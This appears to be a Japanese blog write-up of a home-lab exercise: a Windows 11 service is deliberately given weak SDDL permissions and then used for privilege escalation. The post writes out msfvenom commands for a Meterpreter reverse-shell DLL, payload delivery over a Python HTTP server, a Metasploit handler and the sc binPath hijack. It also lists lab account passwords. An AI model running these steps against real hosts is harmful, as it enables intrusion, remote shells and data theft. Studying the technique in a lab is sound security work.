に投稿に更新セキュリティ / ペネトレーションテスト9分で読む (約1396語)

Windows11で権限に問題のあるサービスを作成して権限昇格を行ってみた

概要

Windows 11上で、サービスのアクセス制御を不適切に設定し、権限昇格につなげる手順を検証します。
NSSMを使ったサービス作成から、SDDLの変更、Meterpreterペイロード配布までの実践的な流れを解説します。

脆弱なサービスの作成

バイナリの用意

適当なバイナリを用意します。
今回はwsl-ssh-pagentを用いました。

続いて、NSSM)をダウンロードします。
NSSMは任意のバイナリを簡単にサービス化できるサービスマネージャーです。

ページ中程の、Latest releaseの項目からダウンロードしてください。

ダウンロードが完了したら、ZIPファイルを任意の場所{nssmPath}に展開します。

サービスの作成

管理者権限でWindowsTerminalを立ち上げ、
先ほどNSSMを解凍した{nssmPath}\win64に移動します。

続いて、以下のコマンドを入力しサービスを作成します。

1
2
3
.\nssm.exe install ssh-pagent "<任意のバイナリ>" "<バイナリに与える引数>"
.\nssm.exe set ssh-pageant AppDirectory "<バイナリ保存先>"
cmd /c sc config ssh-pagent start= auto

作成したサービスは以下のコマンドで確認することができます。

1
cmd /c sc qc ssh-pagent

サービスのSDDL記述も確認します。

1
cmd /c sc sdshow ssh-pagent

権限の変更

脆弱なサービスにするため、
BA(管理者)の権限をWD(Everyone)に付け替えます。

具体的には、SDDLのBA)の箇所をWD)に置換しましょう。

参考: Security Descriptor String Format - Win32 apps | Microsoft Learn (Accessed:Tue Apr 14 2026)

作成したSDDLを以下のコマンドで投入します。

1
cmd /c sc sdset ssh-pagent "<SDDL>"

アカウント情報

ドメイン: lab.internal
AD 一般: john / Vulpes.velox
AD 管理者: administrator / Vulpes.lagopus
Win11ローカル: admin / Vulpes.lagopus
Kali Linux: kali / kali

攻撃シナリオ

  1. 攻撃者がリモートデスクトップ接続等で一般ユーザーを侵害。
  2. 攻撃者はMeterpreter DLLを生成し、HTTPサーバー経由で標的ホストへ配布する。
  3. 権限の低いアカウントでサービスの binPath を改ざんし、不正なDLLを実行するサービスとして再構成する。
  4. サービスを再起動すると、Meterpreterが管理者権限で起動し、攻撃者のリスナーへリバースシェルを返す。
  5. 管理者権限を得た後、システム情報の取得や proof.txt の奪取など、横展開およびデータ窃取を行う。

攻撃

Meterpreterのペイロードを生成・配信

以下のコマンドでペイロード生成

1
msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=10.114.51.102 lport=4444 -f dll > service.dll

Kaliでサーバを立てる。

1
python3 -m http.server 8080

LAB-FAT-0001のブラウザからダウンロードする形でペイロードを送信。

metasproitでリバースシェルを待ち受ける。

1
2
3
4
5
6
msfconsole
use exploit/multi/handler
set lhost <kaliのIP>
set lport 4444
set payload windows/x64/meterpreter_reverse_tcp
exploit

問題のあるサービスを改ざん

以下のコマンドで、先ほどダウンロードしてきたmeterpreterをサービスに登録する。

1
sc config ssh-pagent binPath= "C:\Windows\System32\rundll32.exe C:\Users\john\service.dll,0"

登録されたサービスを確認。

サービスを再起動する

1
2
sc stop ssh-pagent
sc start ssh-pagent

エラーが発生するが、問題ない

Kali LinuxのMeterpreterにもリバースシェルの通知が来る。

実行

システム情報閲覧

権限確認

管理者ユーザーのデスクトップに配置されたproof.txt奪取

参考文献

NSSM - the Non-Sucking Service Manager (Accessed:Tue Apr 14 2026)

Security Descriptor String Format - Win32 apps | Microsoft Learn (Accessed:Tue Apr 14 2026)

Windows11で権限に問題のあるサービスを作成して権限昇格を行ってみた

https://lunatic.red/2026/04/14/Windows11で権限に問題のあるサービスを作成して権限昇格を行ってみた/

Author

fuchse-ohren

Posted on

2026-04-14

Updated on

2026-04-15

Licensed under

#

コメント

フォローする

カテゴリ

最近の記事

アーカイブ

タグ

セキュリティ5
サーバ4
Windows4
nginx3
広告ブロック2
RHEL2
Linux2
ネットワーク2
Windows112
Yubikey2
Podman1
Invidious1
YouTube1
PostgreSQL1
Kubernetes1
コンテナ1
JA31
JA41
TLS指紋1
TLSフィンガープリント1
DDoS対策1
マルウェア検知1
Bot検知1
TLSハンドシェイク1
ネットワーク監視1
グループポリシー1
バックアップ1
復元1
PowerShell1
設定管理1
LGPO.exe1
DNS1
DoT1
Android1
プライベートDNS1
LibreOffice1
PDF1
PDF/A1
変換1
Python1
WSL1
OracleLinux1
パケット解析1
nfstream1
OpenSSL1
証明書1
クライアント証明書1
楕円曲線暗号1
ECC1
PKI1
パスキー1
Bluetooth1
認証1
SSH1
公開鍵認証1
Proxmox1
SSL/TLS1
Let's Encrypt1
certbot1
自動更新1
firewalld1
systemd1
トラブルシューティング1
設定ミス1
競合1
Chromium1
DRM1
Widevine1
動画配信1
設定1
wireguard1
vpn1
ipv61
チュートリアル1
linux1
oci1
ネットワーク設定1
POPOPO1
メタバース1
プライバシー1
中国クラウド1
Tencent TRTC1
著作権1
著作者人格権1
VRChat1
SNS1
リスク分析1
通話アプリ1
データ保護1
Ethereum1
ブロックチェーン1
PoS1
プライベートネットワーク1
Docker1
Web31
イーサリアム1
権限昇格1
サービス1
SDDL1
攻撃手法1
×